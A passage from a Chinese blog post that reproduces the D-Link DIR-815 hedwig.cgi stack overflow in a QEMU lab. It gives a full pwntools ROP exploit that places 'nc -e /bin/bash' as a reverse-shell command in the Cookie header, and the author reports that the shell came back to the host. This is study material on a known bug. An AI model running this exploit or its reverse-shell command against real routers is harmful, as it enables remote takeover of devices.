/htdocs/web/hedwig.cgi</span><br><span class="line">ln -s /htdocs/cgibin /usr/sbin/phpcgi</span><br><span class="line">ln -s  /htdocs/cgibin /usr/sbin/hnap</span><br><span class="line">./httpd -f http_conf</span><br></pre></td></tr></table></figure>



<p>最后进到 <code>/squashfs-root/sbin</code> 目录下，执行 <code>./httpd -f /root/squashfs-root/http_conf</code></p>
<p>在宿主机中访问 <code>http://10.214.140.139/hedwig.cgi</code> 发现可以正常访问了（如下）</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305220922344.png" alt="image-20230522092237155"></p>
<p>开启 <code>httpd</code> 服务后，如果要进行调试则需要下载一个 <a target="_blank" rel="noopener" href="https://github.com/rapid7/embedded-tools/tree/master/binaries/gdbserver">gdbserver.mipsle</a> ，然后再用 <code>scp</code> 命令将其上传到 <code>qemu</code> 中的 <code>/root/squashfs-root/</code> 目录下。</p>
<p>在 <code>qemu</code> 中 <code>/root/squashfs-root/</code> 目录下新建 <code>run.sh</code> 脚本（<code>IP</code> 改成宿主机的，端口）</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/bin/bash</span></span><br><span class="line">export CONTENT_LENGTH=&quot;11&quot;</span><br><span class="line">export CONTENT_TYPE=&quot;application/x-www-form-urlencoded&quot;</span><br><span class="line">export HTTP_COOKIE=&quot;uid=`cat payload`&quot;</span><br><span class="line">export REQUEST_METHOD=&quot;POST&quot;</span><br><span class="line">export REQUEST_URI=&quot;2333&quot;</span><br><span class="line">echo &quot;winmt=pwner&quot;|./gdbserver.mipsle 10.214.140.140:7788 /htdocs/web/hedwig.cgi</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash"><span class="built_in">echo</span> <span class="string">&quot;winmt=pwner&quot;</span>|/htdocs/web/hedwig.cgi</span></span><br><span class="line">unset CONTENT_LENGTH</span><br><span class="line">unset CONTENT_TYPE</span><br><span class="line">unset HTTP_COOKIE</span><br><span class="line">unset REQUEST_METHOD</span><br><span class="line">unset REQUEST_URI</span><br></pre></td></tr></table></figure>

<p>正常情况下应该是能从宿主机中调试 <code>qemu</code> 中的程序，但我这里报了这个错误（折腾了很久也没有解决，于是就暂时放弃了远程调试的想法）</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305221824553.png" alt="image-20230522182439980" style="zoom:50%;" />



<p>不过还有一个方法也能确定 <code>libc</code> 基地址，就是用运行 <code>hedwig.cgi</code> 后进行后台挂起，然后用 <code>cat /proc/pid/maps</code> 查看，先跑几次程序，发现 <code>pid</code> 的增长是有规律的，于是提前预测一下，多尝试几次就能打印出来内存布局获取 <code>libc</code> 基地址（如下）</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305221542829.png" alt="image-20230522154245358"></p>
<p>因为没法调试，这里就直接用网上师傅的脚本打了（主要用户模式已经写了好几种脚本，这个没法调试的问题死活解决不了，导致了没法调试 <code>rop</code>的布局）思路和用户模式 <code>ROP-system</code> 的那个脚本是一样的，就把命令换成反弹 <code>shell</code> 的命令即可</p>
<h4 id="EXP-2"><a href="#EXP-2" class="headerlink" title="EXP"></a>EXP</h4><figure class="highlight py"><table><tr><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.endian = <span class="string">&quot;little&quot;</span></span><br><span class="line">context.arch = <span class="string">&quot;mips&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_payload</span>(<span class="params">offset, libc_base, cmd</span>):</span><br><span class="line">    Calcsystem = <span class="number">0x158c8</span>    <span class="comment"># $s0 add 1, jalr $s5</span></span><br><span class="line">    Callsystem = <span class="number">0x159cc</span>    <span class="comment"># &#x27;/bin/sh&#x27; -&gt; $a0, jalr system</span></span><br><span class="line">    system_addr_1 = <span class="number">0x53200</span> - <span class="number">1</span></span><br><span class="line">    payload = <span class="string">b&#x27;A&#x27;</span> * offset  <span class="comment"># 973</span></span><br><span class="line">    payload += p32(libc_base + system_addr_1)  <span class="comment"># s0     977</span></span><br><span class="line">    payload += <span class="string">b&#x27;A&#x27;</span> * <span class="number">4</span>                        <span class="comment"># s1     981</span></span><br><span class="line">    payload += <span class="string">b&#x27;A&#x27;</span> * <span class="number">4</span>                        <span class="comment"># s2     985</span></span><br><span class="line">    payload += <span class="string">b&#x27;A&#x27;</span> * <span class="number">4</span>                        <span class="comment"># s3     989</span></span><br><span class="line">    payload += <span class="string">b&#x27;A&#x27;</span> * <span class="number">4</span>                        <span class="comment"># s4     993</span></span><br><span class="line">    payload += p32(libc_base + Callsystem)     <span class="comment"># s5     997</span></span><br><span class="line">    payload += <span class="string">b&#x27;A&#x27;</span> * <span class="number">4</span>                        <span class="comment"># s6     1001</span></span><br><span class="line">    payload += <span class="string">b&#x27;A&#x27;</span> * <span class="number">4</span>                        <span class="comment"># s7     1005</span></span><br><span class="line">    payload += <span class="string">b&#x27;A&#x27;</span> * <span class="number">4</span>                        <span class="comment"># fp     1009</span></span><br><span class="line">    payload += p32(libc_base + Calcsystem)     <span class="comment"># ra</span></span><br><span class="line">    payload += <span class="string">b&#x27;B&#x27;</span> * <span class="number">0x10</span></span><br><span class="line">    payload += cmd</span><br><span class="line">    <span class="keyword">return</span> payload</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    cmd = <span class="string">b&quot;nc -e /bin/bash 10.214.140.144 7788&quot;</span></span><br><span class="line">    cookie = <span class="string">b&#x27;uid=&#x27;</span> + get_payload(<span class="number">973</span>, <span class="number">0x2aaf8000</span>, cmd)</span><br><span class="line">    header = &#123;</span><br><span class="line">        <span class="string">&#x27;Cookie&#x27;</span>: cookie,</span><br><span class="line">        <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;application/x-www-form-urlencoded&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;Content-Length&#x27;</span>: <span class="string">&#x27;100&#x27;</span></span><br><span class="line">    &#125;</span><br><span class="line">    data = &#123;<span class="string">&#x27;x&#x27;</span>: <span class="string">&#x27;x&#x27;</span>&#125;</span><br><span class="line">    ip_port = sys.argv[<span class="number">1</span>]</span><br><span class="line">    url = <span class="string">&quot;http://&quot;</span> + ip_port + <span class="string">&quot;/hedwig.cgi&quot;</span></span><br><span class="line">    r = requests.post(url=url, headers=header, data=data)</span><br><span class="line">    <span class="built_in">print</span>(r.text)</span><br></pre></td></tr></table></figure>

<p>可以看到是已经将 <code>qemu</code> 中模拟的环境 <code>shell</code> 反弹到了宿主机上。</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305221606264.png" alt="image-20230522160633923"></p>
<h3 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h3><p><a target="_blank" rel="noopener" href="https://bbs.kanxue.com/thread-272318.htm">从零开始复现 DIR-815 栈溢出漏洞-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/unr4v31/p/16072562.html">DLink 815路由器栈溢出漏洞分析与复现 - unr4v31 - 博客园 (cnblogs.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_44223394/article/details/128756188">从零到一：复现 DIR-815 栈溢出漏洞_Y6blNU1L的博客-CSDN博客</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/jasonactions/article/details/118931633">qemu与宿主机网络通信配置_ubuntu主机和qemu网络互通_HZero.chen的博客-CSDN博客</a></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/MIPS%E6%9E%B6%E6%9E%84/" rel="tag"># MIPS架构</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/posts/919c29c4.html" rel="prev" title="IOT安全入门学习--MIPS汇编基础">
                  <i class="fa fa-chevron-left"></i> IOT安全入门学习--MIPS汇编基础
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/posts/e4508dbd.html" rel="next" title="Ciscn2023-华中赛区分区赛-pwn-wp">
                  Ciscn2023-华中赛区分区赛-pwn-wp <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">ZIKH26</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  <script src="/js/third-party/pace.js"></script>


  





</body>
</html>
